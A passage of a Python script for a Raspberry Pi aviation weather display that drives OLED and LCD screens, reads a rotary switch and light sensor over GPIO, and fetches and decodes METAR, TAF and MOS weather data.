loglevels = [logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR]
logzero.loglevel(loglevels[loglevel]) #Choices in order; DEBUG, INFO, WARNING, ERROR
logzero.logfile("/NeoSectional/logfile.log", maxBytes=1e6, backupCount=3)
logger.info("\n\nStartup of metar-display-v4.py Script, Version " + version)
logger.info("Log Level Set To: " + str(loglevels[loglevel]))
#****************************************************************************
#* User defined Setting Here - Make changes in config.py instead of here. *
#****************************************************************************
#rotate and oled wiring order
rotyesno = config.rotyesno #Rotate 180 degrees, 0 = No, 1 = Yes
oledposorder = config.oledposorder #Oled Wiring Position, 0 = Normally pos 0-7, 1 = Backwards pos 7-0
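#A minimal sketch (helper names illustrative, not from the original script) of how these two
#settings are typically applied: rotyesno flips each rendered PIL frame, and oledposorder
#reverses the order in which the displays are visited. Note numofdisplays is defined further
#down in the settings, so these helpers are only valid once the module has finished loading.
def orient(image):
    #Flip the rendered frame 180 degrees when the displays are mounted upside down.
    return image.rotate(180) if rotyesno else image

def oled_order():
    #Visit displays 0-7 normally, or 7-0 when they were wired back-to-front.
    positions = list(range(numofdisplays))
    return positions[::-1] if oledposorder else positions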
#create list of airports to exclusively display on the OLEDs
exclusive_list = config.exclusive_list #Must be in this format: ['KFLG', 'KSEZ', 'KPHX', 'KCMR', 'KINW', 'KPAN', 'KDVT', 'KGEU']
exclusive_flag = config.exclusive_flag #0 = Do not use exclusive list, 1 = only use exclusive list
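#A minimal sketch (function name illustrative) of how the exclusive list is applied to the
#full set of stations read from the airports file:
def apply_exclusive_list(stations):
    #When the flag is set, keep only the airports named above; otherwise pass through.
    if exclusive_flag:
        return [ap for ap in stations if ap in exclusive_list]
    return stations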
#Specific Variables to default data to display if Rotary Switch is not installed.
wind_numorarrow = config.wind_numorarrow #0 = Display Wind direction using arrows, 1 = Display wind direction using numbers.
#Typically if rotary switch is not used, METAR's will be displayed exclusively. But if metar_taf = 0, then TAF's can be the default.
hour_to_display = config.time_sw0 #Offset in HOURS to choose which TAF to display
metar_taf_mos = config.data_sw0 #0 = Display TAF, 1 = Display METAR, 2 = Display MOS, 3 = Heat Map
toggle_sw = -1 #Set toggle_sw to an initial value that forces rotary switch to dictate data displayed.
data_sw0 = config.data_sw0 #User selectable source of data on Rotary Switch position 0. 0 = TAF, 1 = METAR, 2 = MOS
data_sw1 = config.data_sw1 #User selectable source of data on Rotary Switch position 1. 0 = TAF, 1 = METAR, 2 = MOS
data_sw2 = config.data_sw2 #User selectable source of data on Rotary Switch position 2. 0 = TAF, 1 = METAR, 2 = MOS
data_sw3 = config.data_sw3 #User selectable source of data on Rotary Switch position 3. 0 = TAF, 1 = METAR, 2 = MOS
data_sw4 = config.data_sw4 #User selectable source of data on Rotary Switch position 4. 0 = TAF, 1 = METAR, 2 = MOS
data_sw5 = config.data_sw5 #User selectable source of data on Rotary Switch position 5. 0 = TAF, 1 = METAR, 2 = MOS
data_sw6 = config.data_sw6 #User selectable source of data on Rotary Switch position 6. 0 = TAF, 1 = METAR, 2 = MOS
data_sw7 = config.data_sw7 #User selectable source of data on Rotary Switch position 7. 0 = TAF, 1 = METAR, 2 = MOS
data_sw8 = config.data_sw8 #User selectable source of data on Rotary Switch position 8. 0 = TAF, 1 = METAR, 2 = MOS
data_sw9 = config.data_sw9 #User selectable source of data on Rotary Switch position 9. 0 = TAF, 1 = METAR, 2 = MOS
data_sw10 = config.data_sw10 #User selectable source of data on Rotary Switch position 10. 0 = TAF, 1 = METAR, 2 = MOS
data_sw11 = config.data_sw11 #User selectable source of data on Rotary Switch position 11. 0 = TAF, 1 = METAR, 2 = MOS
time_sw0 = config.time_sw0 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw1 = config.time_sw1 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw2 = config.time_sw2 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw3 = config.time_sw3 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw4 = config.time_sw4 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw5 = config.time_sw5 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw6 = config.time_sw6 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw7 = config.time_sw7 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw8 = config.time_sw8 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw9 = config.time_sw9 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw10 = config.time_sw10 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
time_sw11 = config.time_sw11 #Number of hours ahead to display. Time equals time period of TAF/MOS to display.
displayIP = config.displayIP #display IP address with welcome message, 0 = No, 1 = Yes
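#A minimal sketch of the common socket-module trick for finding the local IP address to show
#with the welcome message; no packets are actually sent by connect() on a UDP socket. The
#function name is illustrative, and 8.8.8.8 is just a routable placeholder address.
def get_local_ip():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(('8.8.8.8', 80))
        return s.getsockname()[0] #Address of the interface the OS chose
    finally:
        s.close()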
#MOS Config settings
prob = config.prob #Probability threshold in percent used to decide whether forecast weather is displayed on the map or not.
#Specific settings for on/off timer. Used to turn off LED's at night if desired.
#Verify Raspberry Pi is set to the correct time zone, otherwise the timer will be off.
usetimer = config.usetimer #0 = No, 1 = Yes. Turn the timer on or off with this setting
offhour = config.offhour #Use 24 hour time. Set hour to turn off display
offminutes = config.offminutes #Set minutes to turn off display
onhour = config.onhour #Use 24 hour time. Set hour to turn on display
onminutes = config.onminutes #Set minutes to turn on display
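#A minimal sketch of the midnight-spanning window check the timer fix relies on, using the
#time_ alias imported above. The helper name is illustrative. Example use:
#time_in_range(time_(offhour, offminutes), time_(onhour, onminutes), datetime.now().time())
def time_in_range(start, end, x):
    #True when x falls in [start, end), including windows that wrap past midnight,
    #e.g. off at 21:30 and back on at 06:30 the next morning.
    if start <= end:
        return start <= x < end
    return start <= x or x < end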
#Sleep Timer settings
tempsleepon = config.tempsleepon #Set number of MINUTES to turn map on temporarily during sleep mode
sleepmsg = config.sleepmsg #Display message "Sleeping". 0 = No, 1 = Yes.
#Display type to use. Both can be used but will delay before updating each display.
lcddisplay = config.lcddisplay #1 = Yes, 0 = No. Using an LCD to display the highest winds. Scripted for 64x2 LCD display use.
oledused = config.oledused #1 = Yes, 0 = No. Using a single OLED to display the highest winds and airports
#Misc Settings - Should match the values in metar-v3.py
update_interval = config.update_interval #Number of MINUTES between FAA updates - 15 minutes is a good compromise.
metar_age = config.metar_age #Metar Age in HOURS. This will pull the latest metar that has been published within the timeframe listed here.
num2display = config.num2display #number of highest wind airports to display. Can be as high as airports listed in airports file. 5 to 10 good number.
abovekts = config.abovekts #1 = Yes, 0 = No. If "Yes" then only display high winds above value stored in 'minwinds' below.
minwinds = config.max_wind_speed #Value in knots to filter high winds. If abovekts is 1, don't display winds less than this value on LCD/OLED
#LCD Display settings
lcdpause = config.lcdpause #pause between character movements in scroll.
#OLED Display settings
numofdisplays = config.numofdisplays #Number of OLED displays being used. 1 Oled minimum. With TCA9548A I2C Multiplexer, 8 can be used.
oledpause = config.oledpause #Pause time in seconds between airport display updates
fontsize = config.fontsize #Size of font for OLED display. 24 works well with current font type
boldhiap = config.boldhiap #1 = Yes, 0 = No. Bold the text for the airport that has the highest windspeed.
blankscr = config.blankscr #1 = Yes, 0 = No. Add a blank screen between the group of airports to display.
offset = config.offset #Pixel offset for OLED text display vertically. Leave at 3 for current font type.
border = config.border #0 = no border, 1 = yes border. Either works well.
dimswitch = config.dimswitch #0 = Full Bright, 1 = Low Bright, 2 = Medium Bright, if IC238 Light Sensor is NOT used.
dimmin = config.dimmin #Set value 0-255 for the minimum brightness (0=darker display, but not off)
dimmax = config.dimmax #Set value 0-255 for the maximum brightness (bright display)
invert = config.invert #0 = normal display, 1 = inverted display, supercedes toginv. Normal = white text on black background.
toginv = config.toginv #0 = no toggle of inverted display. 1 = toggle inverted display between groups of airports
scrolldis = config.scrolldis #0 = Scroll display to left, 1 = scroll display to right
usewelcome = config.usewelcome #0 = No, 1 = Yes. Display a welcome message on the displays?
welcome = config.welcome #will display each time the FAA weather is updated.
displaytime = config.displaytime #0 = No, 1 = Yes. Display the local and Zulu Time between hi-winds display
#*********************************
#* End of User Defined Settings *
#*********************************
#misc settings that won't normally need to be changed.
fontindex = 0 #Font selected may have various versions that are indexed. 0 = Normal. Leave at 0 unless you know otherwise.
backcolor = 0 #0 = Black, background color for OLED display. Shouldn't need to change
fontcolor = 255 #255 = White, font color for OLED display. Shouldn't need to change
temp_time_flag = 0 #Set flag for next round of tempsleepon activation (temporarily turns on map when in sleep mode)
#Set general GPIO parameters
GPIO.setmode(GPIO.BCM) #set mode to BCM and use BCM pin numbering, rather than BOARD pin numbering.
GPIO.setwarnings(False)
#Set GPIO pin 4 for IC238 Light Sensor, if used.
GPIO.setup(4, GPIO.IN) #set pin 4 as input for light sensor, if one is used. If no sensor used board remains at high brightness always.
#set GPIO pin 22 to momentary push button to force FAA Weather Data update if button is used.
GPIO.setup(22, GPIO.IN, pull_up_down=GPIO.PUD_UP)
#Setup GPIO pins for rotary switch to choose between METARs, or TAFs and which hour of TAF
#Not all the pins are required to be used. If only METARS are desired, then no Rotary Switch is needed.
#A rotary switch with up to 12 poles can be installed, but as few as 2 poles will switch between METARs and TAFs
GPIO.setup(0, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 0 to ground for METARS
GPIO.setup(5, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 5 to ground for TAF + 1 hour
GPIO.setup(6, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 6 to ground for TAF + 2 hours
GPIO.setup(13, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 13 to ground for TAF + 3 hours
GPIO.setup(19, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 19 to ground for TAF + 4 hours
GPIO.setup(26, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 26 to ground for TAF + 5 hours
GPIO.setup(21, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 21 to ground for TAF + 6 hours
GPIO.setup(20, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 20 to ground for TAF + 7 hours
GPIO.setup(16, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 16 to ground for TAF + 8 hours
GPIO.setup(12, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 12 to ground for TAF + 9 hours
GPIO.setup(1, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 1 to ground for TAF + 10 hours
GPIO.setup(7, GPIO.IN, pull_up_down=GPIO.PUD_UP) #set pin 7 to ground for TAF + 11 hours
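#Illustrative helper (not part of the original flow - the main loop below polls
#each pin individually): with the pin-to-position wiring configured above, the
#switch position could be read in one pass. 'ROTARY_PINS' and
#'read_rotary_position' are names introduced here for the example only.
ROTARY_PINS = [0, 5, 6, 13, 19, 26, 21, 20, 16, 12, 1, 7] #list index = switch position
def read_rotary_position():
    for position, pin in enumerate(ROTARY_PINS):
        if not GPIO.input(pin): #pole pulled to ground = switch is at this position
            return position
    return -1 #no pole grounded; treat as no rotary switch installed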
# Raspberry Pi pin configuration:
RST = None #on the PiOLED this pin isn't used
#Setup Adafruit library for OLED display.
disp = Adafruit_SSD1306.SSD1306_128_64(rst=RST) #128x64 or 128x32 - disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)
TCA_ADDR = 0x70 #use cmd i2cdetect -y 1 to ensure multiplexer shows up at addr 0x70
tca = I2C.get_i2c_device(address=TCA_ADDR)
port = 1 #Default port. set to 0 for original RPi or Orange Pi, etc
bus = smbus2.SMBus(port) #From smbus2 set bus number
#Setup paths for restart on change routine. Routine from;
#https://blog.petrzemek.net/2014/03/23/restarting-a-python-script-within-itself
LOCAL_CONFIG_FILE_PATH = '/NeoSectional/config.py'
WATCHED_FILES = [LOCAL_CONFIG_FILE_PATH, __file__]
WATCHED_FILES_MTIMES = [(f, getmtime(f)) for f in WATCHED_FILES]
logger.info('Watching ' + LOCAL_CONFIG_FILE_PATH + ' For Change')
#Timer calculations - Part of Timer Fix - Thank You to Matthew G
now = datetime.now() #Get current time and compare to timer setting
lights_out = time_(offhour, offminutes, 0)
timeoff = lights_out
lights_on = time_(onhour, onminutes, 0)
end_time = lights_on
delay_time = 10 #Number of seconds to delay before retrying to connect to the internet.
temp_lights_on = 0 #Set flag for next round if sleep timer is interrupted by button push.
#MOS related settings
mos_filepath = '/NeoSectional/GFSMAV' #location of the downloaded local MOS file.
categories = ['HR', 'CLD', 'WDR', 'WSP', 'P06', 'T06', 'POZ', 'POS', 'TYP', 'CIG','VIS','OBV'] #see legend below
obv_wx = {'N': 'None', 'HZ': 'HZ','BR': 'RA','FG': 'FG','BL': 'HZ'} #Decode from MOS to TAF/METAR
typ_wx = {'S': 'SN','Z': 'FZRA','R': 'RA'} #Decode from MOS to TAF/METAR
mos_dict = collections.OrderedDict() #Outer Dictionary, keyed by airport ID
hour_dict = collections.OrderedDict() #Middle Dictionary, keyed by hour of forecast. Will contain a list of data for categories.
ap_flag = 0 #Used to determine that an airport from our airports file is currently being read.
hmdata_dict = {} #Used for top 10 list for heat map
startnum = 0 #Used for cycling through the number of displays used.
stopnum = numofdisplays #Same
stepnum = 1 #Same
#Get info to display active IP address
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
logger.info("Settings Loaded")
#Functions
# Part of Timer Fix - Thank You to Matthew G
# See if a time falls within a range
def time_in_range(start, end, x):
    if start <= end:
        return start <= x <= end
    else:
        return start <= x or x <= end
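#Example (illustrative values): an overnight window, off at 21:30 and back on
#at 06:00, wraps past midnight and is handled by the 'else' branch above:
#  time_in_range(time_(21, 30, 0), time_(6, 0, 0), time_(23, 0, 0)) -> True
#  time_in_range(time_(21, 30, 0), time_(6, 0, 0), time_(12, 0, 0)) -> False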
#Functions for LCD Display
def write_to_lcd(lcd, framebuffer, num_cols):
    #Write the framebuffer out to the specified LCD.
    lcd.home()
    for row in framebuffer:
        lcd.write_string(row.ljust(num_cols)[:num_cols])
        lcd.write_string('\r\n')
def loop_string(string, lcd, framebuffer, row, num_cols, delay=0.4):
    padding = ' ' * num_cols
    s = padding + string + padding
    for i in range(len(s) - num_cols + 1):
        framebuffer[row] = s[i:i+num_cols]
        write_to_lcd(lcd, framebuffer, num_cols)
        time.sleep(delay)
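#Illustrative usage (hypothetical values): scroll a message across row 1 of a
#16x2 LCD while row 0 stays fixed; 'lcd' must be the CharLCD instance created
#in the LCD section further below.
#  framebuffer = ['5 Highest Winds', '']
#  loop_string('KABQ:12kts KSAF:9kts', lcd, framebuffer, 1, 16, delay=0.4)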
#Functions for OLED display
def tca_select(channel): #Used to tell the multiplexer which oled display to send data to.
    #Select an individual channel
    if channel > 7 or numofdisplays < 2: #Verify we need to use the multiplexer.
        return
    tca.writeRaw8(1 << channel) #from Adafruit_GPIO I2C
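#Example: tca_select(3) writes 0b00001000 to the TCA9548A, routing subsequent
#I2C traffic to the OLED on multiplexer channel 3. With a single display
#(numofdisplays < 2) the call returns without touching the multiplexer.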
def oledcenter(txt, ch, font, dir=0, dim=dimswitch, onoff=0, pause=0): #Center text vertically and horizontally
    tca_select(ch) #Select the display to write to
    oleddim(dim) #Set brightness: 0 = full bright, 1 = low bright, 2 = medium bright
    draw.rectangle((0, 0, width-1, height-1), outline=border, fill=backcolor) #blank the display
    x1, y1, x2, y2 = 0, 0, width, height #create boundaries of display
    if dir == "" or txt == '\n' or 'Updated' in txt or 'Calm' in txt: #Print text other than wind directions and speeds
        pass
    elif 'METARs' in txt or 'TAF' in txt or 'MOS' in txt or 'Heat' in txt: #Print text other than wind directions and speeds
        pass
    elif wind_numorarrow == 0: #draw wind direction using arrows
        arrowdir = winddir(dir) #get the proper arrow to display
        draw.text((96, 37), arrowdir, font=arrows, fill=fontcolor) #lower right of oled
        txt = txt + 'kts'
    else: #draw wind direction using numbers
        ap, wndsp = txt.split('\n')
        wnddir = str(dir)
        if len(wnddir) == 2: #pad direction with zeros to get 3 digits.
            wnddir = '0' + wnddir
        elif len(wnddir) == 1:
            wnddir = '00' + wnddir
        #Calm and VRB winds contributed by Lance Black - Thank you Lance
        #(missing-gust checks are ordered first so the numeric comparisons below can't fail on a None gust)
        if wnddir == '000' and wndsp == '0':
            txt = ap + "\n" + 'Calm'
        elif wnddir == '000' and wndsp >= '1' and (gust == 0 or gust == '' or gust is None):
            txt = ap + "\n" + 'VRB@' + wndsp + 'kts'
        elif wnddir == '000' and wndsp >= '1' and gust > 0:
            txt = ap + "\n" + 'VRB@' + wndsp + 'g' + str(gust)
        elif gust == 0 or gust == '' or gust is None: #Lance Blank
            txt = ap + '\n' + wnddir + chr(176) + '@' + wndsp + 'kts' #'360@21kts' layout
        elif gust > 0:
            txt = ap + '\n' + wnddir + '@' + wndsp + 'g' + str(gust) #Lance Blank - '360@5g12' layout
        else:
            txt = ap + "\n" + wndsp + 'kts'
    w, h = draw.textsize(txt, font=font) #get textsize of what is to be displayed
    x = (x2 - x1 - w)/2 + x1 #calculate center for text
    y = (y2 - y1 - h)/2 + y1 - offset
    draw.text((x, y), txt, align='center', font=font, fill=fontcolor) #Draw the text to buffer
    invertoled(onoff) #invert display if set
    rotate180(rotyesno) #Rotate display if set
    disp.image(image) #Display image
    disp.display() #display text in buffer
    time.sleep(pause) #pause long enough to be read
def winddir(wndir=0): #Using the arrows.ttf font return arrow to represent wind direction at airport
    if (wndir >= 338 and wndir <= 360) or (wndir >= 1 and wndir <= 22): #8 arrows representing 45 degrees each around the compass.
        return 'd' #wind blowing from the north (pointing down)
    elif wndir >= 23 and wndir <= 67:
        return 'f' #wind blowing from the north-east (pointing lower-left)
    elif wndir >= 68 and wndir <= 113:
        return 'b' #wind blowing from the east (pointing left)
    elif wndir >= 114 and wndir <= 159:
        return 'e' #wind blowing from the south-east (pointing upper-left)
    elif wndir >= 160 and wndir <= 205:
        return 'c' #wind blowing from the south (pointing up)
    elif wndir >= 206 and wndir <= 251:
        return 'g' #wind blowing from the south-west (pointing upper-right)
    elif wndir >= 252 and wndir <= 297:
        return 'a' #wind blowing from the west (pointing right)
    elif wndir >= 298 and wndir <= 337:
        return 'h' #wind blowing from the north-west (pointing lower-right)
    else:
        return '' #No arrow returned
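#Example: winddir(90) returns 'b' (wind from the east, arrow pointing left),
#and winddir(361) falls through to the final else and returns '' - which is
#how the main loop below suppresses the arrow for unknown directions.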
def oleddim(level=0): #Dimming routine. 0 = Full Brightness, 1 = low brightness, 2 = medium brightness. See https://www.youtube.com/watch?v=hFpXfSnDNSY and
    if level == 0: #https://github.com/adafruit/Adafruit_Python_SSD1306/blob/master/Adafruit_SSD1306/SSD1306.py for more info.
        disp.command(0x81) #SSD1306_SETCONTRAST = 0x81
        disp.command(dimmax)
        disp.command(0xDB) #SSD1306_SETVCOMDETECT = 0xDB
        disp.command(dimmax)
    if level == 1 or level == 2:
        disp.command(0x81) #SSD1306_SETCONTRAST = 0x81
        disp.command(dimmin)
    if level == 1:
        disp.command(0xDB) #SSD1306_SETVCOMDETECT = 0xDB
        disp.command(dimmin)
def invertoled(i): #Invert display pixels. Normal = white text on black background.
    if i: #Inverted = black text on white background. 0 = Normal, 1 = Inverted
        disp.command(0xA7) #SSD1306_INVERTDISPLAY
    else:
        disp.command(0xA6) #SSD1306_NORMALDISPLAY
def rotate180(i): #Rotate display 180 degrees to allow mounting of OLED upside down
    if i:
        disp.command(0xA0) #Y Direction
        disp.command(0xC0) #X Direction
def clearoleddisplays():
    for j in range(numofdisplays):
        tca_select(j)
        # disp.clear() #commenting this out sped up the display refresh.
        draw.rectangle((0,0,width-1,height-1), outline=border, fill=backcolor)
        disp.image(image)
        disp.display()
#Compare current time plus offset to TAF's time period and return difference
def comp_time(taf_time):
    global current_zulu
    datetimeFormat = '%Y-%m-%dT%H:%M:%SZ'
    date1 = taf_time
    date2 = current_zulu
    diff = datetime.strptime(date1, datetimeFormat) - datetime.strptime(date2, datetimeFormat)
    diff_minutes = int(diff.seconds/60)
    diff_hours = int(diff_minutes/60)
    return diff.seconds, diff_minutes, diff_hours, diff.days
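#Example (illustrative timestamps): with current_zulu = '2021-06-01T14:00:00Z'
#and a TAF period starting '2021-06-01T16:00:00Z', comp_time returns
#(7200, 120, 2, 0) - 7200 seconds / 120 minutes / 2 hours ahead, same day.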
#Used by MOS decode routine. This routine builds mos_dict nested with hours_dict
def set_data():
    global hour_dict
    global mos_dict
    global dat0, dat1, dat2, dat3, dat4, dat5, dat6, dat7
    global apid
    global temp
    global keys
    #Clean up line of MOS data.
    if len(temp) >= 0: #this check is unneeded. Put here to vary length of list to clean up.
        temp1 = []
        tmp_sw = 0
        for val in temp: #Check each item in the list
            val = val.lstrip() #remove leading white space
            val = val.rstrip('/') #remove trailing /
            if len(val) == 6: #this is for T06 to build appropriate length list
                temp1.append('0') #add a '0' to the front of the list. T06 doesn't report data in first 3 hours.
                temp1.append(val) #add back the original value taken from T06
                tmp_sw = 1 #Turn on switch so we don't go through it again.
            elif len(val) > 2 and tmp_sw == 0: #if item is 1 or 2 chars long, then bypass. Otherwise fix.
                pos = val.find('100') #locate first 100
                tmp = val[0:pos] #capture the first value which is not a 100
                temp1.append(tmp) #and store it in temp list.
                k = 0
                for j in range(pos, len(val), 3): #now iterate through remainder
                    temp1.append(val[j:j+3]) #and capture all the 100's
                    k += 1
            else:
                temp1.append(val) #Store the normal values too.
        temp = temp1
    #load data into appropriate lists by hours designated by current MOS file
    #clean up data by removing '/' and spaces
    temp0 = [x.strip() for x in temp[0].split('/')]
    temp1 = [x.strip() for x in temp[1].split('/')]
    temp2 = [x.strip() for x in temp[2].split('/')]
    temp3 = [x.strip() for x in temp[3].split('/')]
    temp4 = [x.strip() for x in temp[4].split('/')]
    temp5 = [x.strip() for x in temp[5].split('/')]
    temp6 = [x.strip() for x in temp[6].split('/')]
    temp7 = [x.strip() for x in temp[7].split('/')]
    #build a list for each data group. grab 1st element [0] in list to store.
    dat0.append(temp0[0])
    dat1.append(temp1[0])
    dat2.append(temp2[0])
    dat3.append(temp3[0])
    dat4.append(temp4[0])
    dat5.append(temp5[0])
    dat6.append(temp6[0])
    dat7.append(temp7[0])
    #add cat data to the hour_dict by hour (lookup replaces the original 8-branch if/elif chain)
    dats = [dat0, dat1, dat2, dat3, dat4, dat5, dat6, dat7]
    for key, dat in zip(keys, dats):
        hour_dict[key] = dat
    mos_dict[apid] = hour_dict #marry the hour_dict to the proper key in mos_dict
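#Resulting structure (illustrative airport ID): mos_dict['KABQ']['06'][1] would
#hold the WDR (wind direction) value for the 3-hour period starting at 06z -
#i.e. mos_dict[airport][hour][category index], matching the decode loop below.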
##########################
# Start of executed code #
##########################
while True:
logger.info('Start of metar-display-v4.py executed code main loop')
#Time calculations, dependent on the 'hour_to_display' offset. This determines how far in the future the TAF data should be.
#This time is recalculated every time the FAA data gets updated.
zulu = datetime.utcnow() + timedelta(hours=hour_to_display) #Get current time plus Offset
current_zulu = zulu.strftime('%Y-%m-%dT%H:%M:%SZ') #Format time to match what's reported in TAF
current_hr_zulu = zulu.strftime('%H') #Zulu time formatted to just the hour, to compare to MOS data
logger.debug('datetime - ' + str(datetime.utcnow()))
logger.debug('zulu - ' + str(zulu))
logger.debug('hour_to_display - ' + str(hour_to_display))
logger.debug('current_zulu - ' + str(current_zulu))
#Get current date and time
now = datetime.now()
dt_string = now.strftime("%I:%M%p") #12:00PM format
#Dictionary definitions. Need to reset whenever new weather is received
stationiddict = {} #hold the airport identifiers
windsdict = {} #holds the wind speeds by identifier
wnddirdict = {} #holds the wind direction by identifier
wxstringdict = {} #holds the weather conditions by identifier
wndgustdict = {} #hold wind gust by identifier - Mez
#read airports file - read each time weather is updated in case a change to "airports" file was made while script was running.
try:
with open("/NeoSectional/airports") as f:
airports = f.readlines()
except IOError as error:
logger.error('Airports file could not be loaded.')
logger.error(error)
break
airports = [x.strip() for x in airports]
logger.info("Airports File Loaded")
#read hmdata file and display the top 10 airports on the OLEDs
try:
with open("/NeoSectional/hmdata") as f:
hmdata = f.readlines()
except IOError as error:
logger.error('Heat Map file could not be loaded.')
logger.error(error)
break
hmdata = [x.strip() for x in hmdata]
logger.info("Heat Map File Loaded")
for line in hmdata:
hmap, numland = line.split()
hmdata_dict[hmap] = int(numland)
hmdata_sorted = sorted(hmdata_dict.items(), key=lambda x:x[1], reverse=True)
hmdata_sorted.insert(0, 'Top AP\nLandings')
logger.debug(hmdata_sorted)
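#Each line of the hmdata file is expected to be '<airport id> <landing count>',
#e.g. 'KABQ 12' (illustrative). The sort above yields a list like
#[('KABQ', 12), ('KSAF', 7), ...] with the 'Top AP\nLandings' header at index 0.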
#depending on what data is to be displayed, either use a URL for METARs and TAFs or read a file from the drive (pass).
if metar_taf_mos == 1: #Check to see if the script should display TAF data (0) or METAR data (1)
#Define URL to get weather METARS. If no METAR reported within the last 2.5 hours, Airport LED will be white (nowx).
url = "https://www.aviationweather.gov/adds/dataserver_current/httpparam?dataSource=metars&requestType=retrieve&format=xml&mostRecentForEachStation=constraint&hoursBeforeNow="+str(metar_age)+"&stationString="
logger.info("METAR Data Loading")
elif metar_taf_mos == 0: #TAF data
#Define URL to get weather URL for TAF. If no TAF reported for an airport, the Airport LED will be white (nowx).
url = "https://www.aviationweather.gov/adds/dataserver_current/httpparam?dataSource=tafs&requestType=retrieve&format=xml&mostRecentForEachStation=constraint&hoursBeforeNow="+str(metar_age)+"&stationString="
logger.info("TAF Data Loading")
elif metar_taf_mos == 2: #MOS data. This is not accessible in the same way as METARs and TAF's.
pass #This elif is not strictly needed and is only here for clarity
logger.info("MOS Data Loading")
elif metar_taf_mos == 3: #Heat Map data.
pass #This elif is not strictly needed and is only here for clarity
logger.info("Heat Map Data Loading")
#Build URL to submit to FAA with the proper airports from the airports file
if metar_taf_mos != 2 and metar_taf_mos != 3:
for airportcode in airports:
if airportcode == "NULL" or airportcode == "LGND":
continue
url = url + airportcode + ","
url = url[:-1] #strip trailing comma from string
logger.debug(url)
while True: #check internet availability and retry if necessary. Power outage, map may boot quicker than router.
try:
content = urllib.request.urlopen(url)
logger.info('Internet Available')
logger.info(url)
break
except Exception: #urlopen failed - no internet yet or FAA server unreachable
logger.warning('FAA Data is Not Available')
logger.info(url)
time.sleep(delay_time)
pass
root = ET.fromstring(content.read()) #Process XML data returned from FAA
#MOS decode routine
#MOS data is downloaded daily from; https://www.weather.gov/mdl/mos_gfsmos_mav to the local drive by crontab scheduling.
#Then this routine reads through the entire file looking for those airports that are in the airports file. If airport is
#found, the data needed to display the weather for the next 24 hours is captured into mos_dict, which is nested with
#hour_dict, which holds the airport's MOS data by 3 hour chunks. See; https://www.weather.gov/mdl/mos_gfsmos_mavcard for
#a breakdown of what the MOS data looks like and what each line represents.
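#An abbreviated MAV block for one airport looks roughly like this (values are
#placeholders for illustration, not real data):
#  KABQ   GFS MOS GUIDANCE    6/01/2021  1200 UTC
#  DT /JUNE  1            /JUNE  2                /JUNE  3
#  HR   18  21  00  03  06  09  12  15  18  21  00 ...
#  CLD  CL  SC  BK  OV ...
#  WDR  18  20  22  23 ...
#  WSP  08  10  12  09 ...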
if metar_taf_mos == 2:
#Read current MOS text file
try:
file = open(mos_filepath, 'r')
lines = file.readlines()
except IOError as error:
logger.error('MOS data file could not be loaded.')
logger.error(error)
break
for line in lines: #read the MOS data file line by line
line = str(line)
#Ignore blank lines of MOS airport
if line.startswith(' '):
ap_flag = 0
continue
#Check for and grab date of MOS
if 'DT /' in line:
unused, dt_cat, month, unused, unused, day, unused = line.split(" ",6)
continue
#Check for and grab the Airport ID of the current MOS
if 'MOS' in line:
unused, apid, v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, updt1, updt2, v13 = line.split(" ", 14)
mos_updt_time = updt1 + ' ' + updt2 #Grab the MOS report's update timestamp
dt_string = mos_updt_time
#If this Airport ID is in the airports file then grab all the info needed from this MOS
if apid in airports:
ap_flag = 1
cat_counter = 0 #used to determine if a category is being reported in MOS or not. If not, inject 9's in its place.
dat0, dat1, dat2, dat3, dat4, dat5, dat6, dat7 = ([] for i in range(8)) #Clear lists
continue
#If we just found an airport that is in our airports file, then grab the appropriate weather data from its MOS
if ap_flag:
xtra, cat, value = line.split(" ",2) #capture the category the line read represents
#Check if the needed categories are being read and if so, grab its data
if cat in categories:
cat_counter += 1 #used to check if a category is not in mos report for airport
if cat == 'HR': #hour designation
temp = (re.findall(r'\s?(\s*\S+)', value.rstrip())) #grab all the hours from line read
for j in range(8):
tmp = temp[j].strip()
hour_dict[tmp] = '' #create hour dictionary based on mos data
keys = list(hour_dict.keys()) #Get the hours which are the keys in this dict, so they can be properly indexed.
else:
#Check for missing category lines and inject placeholder data if necessary.
if (cat_counter == 5 and cat != 'P06')\
or (cat_counter == 6 and cat != 'T06')\
or (cat_counter == 7 and cat != 'POZ')\
or (cat_counter == 8 and cat != 'POS')\
or (cat_counter == 9 and cat != 'TYP'):
#calculate the number of consecutive missing cats and inject 9's into those positions
a = categories.index(last_cat)+1
b = categories.index(cat)+1
c = b - a - 1
logger.debug(str(apid) + ' ' + str(last_cat) + ' ' + str(cat) + ' ' + str(a) + ' ' + str(b) + ' ' + str(c))
for j in range(c):
temp = ['9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9', '9']
set_data()
cat_counter += 1
#Now write the original cat data read from the line in the mos file
cat_counter += 1
hour_dict = collections.OrderedDict() #clear out hour_dict for next airport
last_cat = cat
temp = (re.findall(r'\s?(\s*\S+)', value.rstrip())) #add the actual line of data read
set_data()
